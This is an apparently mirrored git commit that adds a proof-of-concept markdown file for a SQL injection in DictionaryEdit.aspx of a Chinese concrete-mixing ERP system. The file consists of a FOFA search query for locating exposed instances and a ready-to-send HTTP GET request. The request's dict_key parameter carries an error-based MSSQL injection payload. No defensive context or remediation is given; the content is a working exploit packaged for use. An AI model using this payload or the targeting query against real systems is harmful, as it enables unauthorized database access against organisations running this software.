mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 商混ERP-DictionaryEdit.aspxSQL注入漏洞.md
This commit is contained in:
parent
fb3a3a5b75
commit
8aa8e291d5
18
商混ERP-DictionaryEdit.aspxSQL注入漏洞.md
Normal file
18
商混ERP-DictionaryEdit.aspxSQL注入漏洞.md
Normal file
@ -0,0 +1,18 @@
|
|||||||
|
## 商混ERP-DictionaryEdit.aspxSQL注入漏洞
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
```
|
||||||
|
title="商混ERP系统"
|
||||||
|
```
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
GET /Sys/DictionaryEdit.aspx?dict_key=1%27%20and%201=convert(varchar(100),substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32))-- HTTP/1.1
|
||||||
|
Host:
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: zh-CN,zh;q=0.9
|
||||||
|
User-Agent: Mozilla/5.0
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
Loading…
x
Reference in New Issue
Block a user